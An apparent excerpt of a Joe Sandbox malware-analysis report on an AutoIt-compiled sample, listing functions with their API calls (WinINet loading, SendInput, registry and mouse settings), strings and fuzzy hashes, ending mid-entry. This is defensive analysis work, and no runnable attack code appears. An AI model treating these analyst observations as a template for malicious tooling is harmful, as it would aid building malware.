Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: BuffCharUpper$ClearVariant
String ID: @ExitCode$@ExitMethod
API String ID: 3959644497-2214745556
Opcode ID: a716d707f0bd5257379f6721deef3a17544f8f8ff8fd5a9d8c21a2feecf77613
Instruction ID: 3d018d55bbbd5adba44dc97a11c7304ca77cc37ef3b631a2418edd763fc03717
Opcode Fuzzy Hash: a716d707f0bd5257379f6721deef3a17544f8f8ff8fd5a9d8c21a2feecf77613
Instruction Fuzzy Hash: BE314D76900219AFDB10ABA9EC41EEE77B9EF48315F10842AF50173152DB786949CBA8

Function 0040ABEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0040AC75
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004,?,?,?,00000000,00000001), ref: 0040AC89
SendMessageW.USER32(?,00001002,00000000,?), ref: 0040ACAC

Strings

SysMonthCal32, xrefs: 0040AC42

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 11503d690707827b2dd3ed0369c2305c7705d4a06c693a8b6f2baa214a645079
Instruction ID: 14d7fa46a2dee2dc3646f6fb0c2dd2493d7f4650df8431ad64ce384b3088b83b
Opcode Fuzzy Hash: 11503d690707827b2dd3ed0369c2305c7705d4a06c693a8b6f2baa214a645079
Instruction Fuzzy Hash: 60218032600318BBEF218F54CC45FDA3BA5AB58754F010126FA04B61D0D3B9ACA1DB99

Function 0042B031 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

Part of subcall function 0042FF12: LoadLibraryA.KERNEL32(Wininet.dll,0042B04C,?,00000000), ref: 0042FF1D
Part of subcall function 0042FF12: GetProcAddress.KERNEL32(00000000,InternetCrackUrlW), ref: 0042FF2F

FreeLibrary.KERNEL32(?,?,00000000), ref: 0042B0BB
FreeLibrary.KERNEL32(?,?,00000000), ref: 0042B106

Strings

<, xrefs: 0042B08B
su, xrefs: 0042B0BB, 0042B106

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Library$Free$AddressLoadProc
String ID: <$su
API String ID: 1386263645-1069878865
Opcode ID: bc8154724da4988744ae3f73b3a068960f97eee7dce1caf29509b1ad39073ea0
Instruction ID: 08250e3cd797b4f165cb22cbd0ca780e2f8aa99a4327fa461dcb274be227e967
Opcode Fuzzy Hash: bc8154724da4988744ae3f73b3a068960f97eee7dce1caf29509b1ad39073ea0
Instruction Fuzzy Hash: 4D31B3B1D00229EFCB11DF99E8419DEBBF8EF48300F50816BE815A7251D7799A41DFA4

Function 0040B37A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0040B3EC
LoadLibraryW.KERNEL32(?,?,?,004095E6,?,?,?,?,?,?,?,?,00000000,?,00000001,?), ref: 0040B3F5
SendMessageW.USER32(?,00000467,00000000,?), ref: 0040B409

Strings

SysAnimate32, xrefs: 0040B3C9

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$LibraryLoad
String ID: SysAnimate32
API String ID: 3205928328-1011021900
Opcode ID: 60bcf4f9e98a4ab7d6c914802edf5d53d6059652804dfc9f252d41936e200753
Instruction ID: a7c430d5558a324c019549c7c535725aa8373f33fb7607741f0f21616e2b7dae
Opcode Fuzzy Hash: 60bcf4f9e98a4ab7d6c914802edf5d53d6059652804dfc9f252d41936e200753
Instruction Fuzzy Hash: 7E217F71500218AFDF118F55DC84DAB7BA9EF89368F104626FD14A62E2D339CC51DBA8

Function 0040AA6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0040AAF9
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0040AB04
MoveWindow.USER32(?,?,?,?,?,00000000,?,Listbox,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0040AB23

Strings

Listbox, xrefs: 0040AACC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: f2c24b57c72e74bd4c16310fe02d369d1d4bcaf66d9730a99e10fc43add17c47
Instruction ID: 900ec8e690eb78fd8c93632f1fd8deb6979e6213f13d5d8211199dabb923d6dc
Opcode Fuzzy Hash: f2c24b57c72e74bd4c16310fe02d369d1d4bcaf66d9730a99e10fc43add17c47
Instruction Fuzzy Hash: EB212C7150020DBFDF229F50CD84DDA3BA9EF08398F014226FA44662A1C77A9CA1DB95

Function 004042C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,0000007F), ref: 0040431C
IsDialogMessageW.USER32(?,?), ref: 0040435B

Strings

AutoIt v3 GUI, xrefs: 0040432C
AutoIt v3, xrefs: 00404343

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ClassDialogMessageName
String ID: AutoIt v3$AutoIt v3 GUI
API String ID: 682379513-3732297864
Opcode ID: 2c04c3e885fe4a13a4564aa067ff1c05ecb8970d72aafcf156814eb3c7134043
Instruction ID: 31906f7eeedf88e2066356eeae69c8cc25b19cc0742b4b4f6c180b3507dca45f
Opcode Fuzzy Hash: 2c04c3e885fe4a13a4564aa067ff1c05ecb8970d72aafcf156814eb3c7134043
Instruction Fuzzy Hash: 1021C0B1700304EFDB18DEA4D884B9A73A8FF50305F1010BAEE45E3190E778ED88CA48

Function 0040B2D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0040B341
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0040B356
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0040B362

Strings

msctls_trackbar32, xrefs: 0040B31C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: b6b8602c3e9a2c36321137a8017de26e3863274e984a736940d36414d29ae470
Instruction ID: 53a97837dd6e4f9169c4f51732602e26d21817ba787e7e5a00f6ab4d683d84b6
Opcode Fuzzy Hash: b6b8602c3e9a2c36321137a8017de26e3863274e984a736940d36414d29ae470
Instruction Fuzzy Hash: 6B114C71500248BACF218F55CC48ECB3FB5EF8A768F11426AFE146A2A1C3759C51DBA8

Function 00415DF7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 00414513: RegOpenKeyExW.ADVAPI32(00000004,0045DC34,00000000,00000001,?,?,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,?,?), ref: 00414532
Part of subcall function 00414513: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,-0000076C,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,?,?), ref: 00414549
Part of subcall function 00414513: RegCloseKey.ADVAPI32(?,?,?,004371E3,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,ProgramFilesDir,00000104,%.3d,?,?,-0000076C,?,0045DC34,00000004,?), ref: 0041455A

mouse_event.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00415E70

Strings

1, xrefs: 00415E58
SwapMouseButtons, xrefs: 00415E0A
Control Panel\Mouse, xrefs: 00415E0F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseOpenQueryValuemouse_event
String ID: 1$Control Panel\Mouse$SwapMouseButtons
API String ID: 3120867179-1333076132
Opcode ID: 4c009d8be6e611ea7ee0ed7a481dcb082e4cdc1e9cdb4b0e7271ae557d9b4d1a
Instruction ID: 2ea29db1dba191207fecf7cfac24f3fe5103bd27f5e71a9027c62f24b1f2dd5b
Opcode Fuzzy Hash: 4c009d8be6e611ea7ee0ed7a481dcb082e4cdc1e9cdb4b0e7271ae557d9b4d1a
Instruction Fuzzy Hash: 5E01A2B3E54704FAF31027748C46BFF2198D7957A5F290427FA12E2181F2AC8FC250AA

Function 00408A31 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?), ref: 00408A63
SetMenuItemInfoW.USER32(?,?,00000000,0000002C), ref: 00408A82
DrawMenuBar.USER32 ref: 00408A8E

Strings

,, xrefs: 00408A4B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: ,
API String ID: 3227129158-3772416878
Opcode ID: c76b63d13cbcab5be6d8f3e1f9b0cc11a5ab769ce1081a37cc8b288e6b993584
Instruction ID: 2f9b948e05608c0d9f315e3ffc74653f53923b8b4e1199330be738cfb09ea567
Opcode Fuzzy Hash: c76b63d13cbcab5be6d8f3e1f9b0cc11a5ab769ce1081a37cc8b288e6b993584
Instruction Fuzzy Hash: 6E018C71A14209EEEB219FA0DD44BEE7BB4BF04354F14403FF985A01A1DB788850EF58

Function 0044C282 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

FlsFree.KERNEL32(00000005,0044C583,?,0045B1B8,00000060), ref: 0044C28D
RtlDeleteCriticalSection.NTDLL(00000000), ref: 0044C5EC
RtlDeleteCriticalSection.NTDLL(00000005), ref: 0044C616

Strings

@tF, xrefs: 0044C5D9, 0044C603

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CriticalDeleteSection$Free
String ID: @tF
API String ID: 1584690612-1530334341
Opcode ID: 311dd18445d4ad2da74a40a2d07c8b44770850d90870c5807d943ca217a488f8
Instruction ID: 61e3c6bb3eba4695027c1047a15e5766942772b649c9c3fc9bb0005c32650307
Opcode Fuzzy Hash: 311dd18445d4ad2da74a40a2d07c8b44770850d90870c5807d943ca217a488f8
Instruction Fuzzy Hash: 99F0F432842711A7E6745A199CC841AB29A5B01337B19423FE8BAE3250EB3C9C4149AE

Function 00442E50 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 00442E65
GetTempFileNameA.KERNEL32(?,aut,00000000,00442FBD), ref: 00442E7C

Strings

{QB, xrefs: 00442E50
aut, xrefs: 00442E76

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut${QB
API String ID: 3285503233-2878779683
Opcode ID: 21fe6b80f46257c1ad797387a32405323667ccc13c02846317d97aa5df9483ca
Instruction ID: 3d67460f30d7d14f51de960d09033c2ab69468caedc65b49ba4bb88e44c07f54
Opcode Fuzzy Hash: 21fe6b80f46257c1ad797387a32405323667ccc13c02846317d97aa5df9483ca
Instruction Fuzzy Hash: 1CD05E7150430DFBDB10AB90DC4AFC9776C9714709F0004A1B68495090DAF4D9C58B5A

Function 0043004A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042FD8C,00000001,0042ACF7,?,20000013,?,?,00000000,00000001), ref: 00430055
GetProcAddress.KERNEL32(00000000,HttpQueryInfoW), ref: 00430067

Strings

HttpQueryInfoW, xrefs: 00430061
Wininet.dll, xrefs: 00430050

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: HttpQueryInfoW$Wininet.dll
API String ID: 2574300362-1827896123
Opcode ID: 2c1ab40f9f572c927a0f49cc0b26cfcbf8b99dfb582a9751682da44302c35902
Instruction ID: ae3e7c10155bc4f291df986d1bcd477b896a64aa057136c8ef096f6152cf38fa
Opcode Fuzzy Hash: 2c1ab40f9f572c927a0f49cc0b26cfcbf8b99dfb582a9751682da44302c35902
Instruction Fuzzy Hash: C7D0C970A41302EECB208F71D8497137AF8AB44B02F209A6BB486D1260E77CE480CA1E

Function 00430071 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042FDA2,?,0042AE6F,00000000,00000000,?,00000000,00000000,00000000,80000000,00000000), ref: 0043007C
GetProcAddress.KERNEL32(00000000,HttpOpenRequestW), ref: 0043008E

Strings

HttpOpenRequestW, xrefs: 00430088
Wininet.dll, xrefs: 00430077

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: HttpOpenRequestW$Wininet.dll
API String ID: 2574300362-1025864003
Opcode ID: fa93d8326efd3392f730695c0b1e64c3d25dd35159c5fa05e1670c90f17307a6
Instruction ID: 3aaa05196208d3405ad0e3724d1edfe7fa9879c1e0bd29b72703f7ab18a18b8f
Opcode Fuzzy Hash: fa93d8326efd3392f730695c0b1e64c3d25dd35159c5fa05e1670c90f17307a6
Instruction Fuzzy Hash: CED0C970641302EECB208F71D849B237AF8AB48702F20996AB49ED1260E778C840CE1E

Function 00430023 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042FD76,00000000,0042AAC3,00000000,?,80000000,00000001,00000000), ref: 0043002E
GetProcAddress.KERNEL32(00000000,FtpOpenFileW), ref: 00430040

Strings

FtpOpenFileW, xrefs: 0043003A
Wininet.dll, xrefs: 00430029

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: FtpOpenFileW$Wininet.dll
API String ID: 2574300362-1343039947
Opcode ID: 6420013c9dd9f3a00795251f9aeb9b087d60abef74e79443d0e6b0bbbbe75e81
Instruction ID: 762bacf6f0d06cfb391cf0f2ff01321af7d6c7216697d0843cc30400aa9164b9
Opcode Fuzzy Hash: 6420013c9dd9f3a00795251f9aeb9b087d60abef74e79443d0e6b0bbbbe75e81
Instruction Fuzzy Hash: C3D0C974641302EECB608F61D8497137AF8AB44702F20997BB48AD1261E77CD440CE5E

Function 004300E6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(Wininet.dll,0042FE10,00000000,0042B1F3,00000000,00000032,?,00000008,?,00000003), ref: 004300F1
GetProcAddress.KERNEL32(00000000,InternetSetOptionW), ref: 00430103

Strings

InternetSetOptionW, xrefs: 004300FD
Wininet.dll, xrefs: 004300EC

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: InternetSetOptionW$Wininet.dll
API String ID: 2574300362-1330685833
Opcode ID: 95de0dffc22d0963259c4d69c6c45233e077d41ec1b1f5133d5896be310fb27d
Instruction ID: ff59ce156c35f3968f4afa164b3a05efdcf9e96a6bec108e9525e22fa4784c4e
Opcode Fuzzy Hash: 95de0dffc22d0963259c4d69c6c45233e077d41ec1b1f5133d5896be310fb27d
Instruction Fuzzy Hash: 56D0C970641312EECB20AF61D8497137FE8AB55702F20996AB486D1262E778C440CF1E

Function 004120F8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32.dll,00410D3B,?,?,004115D3,00000012,?,00000000,?,00000000), ref: 00412103
GetProcAddress.KERNEL32(00000000,SendInput), ref: 00412115

Strings

SendInput, xrefs: 0041210F
user32.dll, xrefs: 004120FE

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SendInput$user32.dll
API String ID: 2574300362-1064832393
Opcode ID: 4ead3b7de1eb813e2890999ff995c73bf3de4ffd0baf0b3798f1e810c2294c97
Instruction ID: b963cc7c8b00b921c783b673ea5c61c7744dee692fadaf3b76782265ccaed0cb
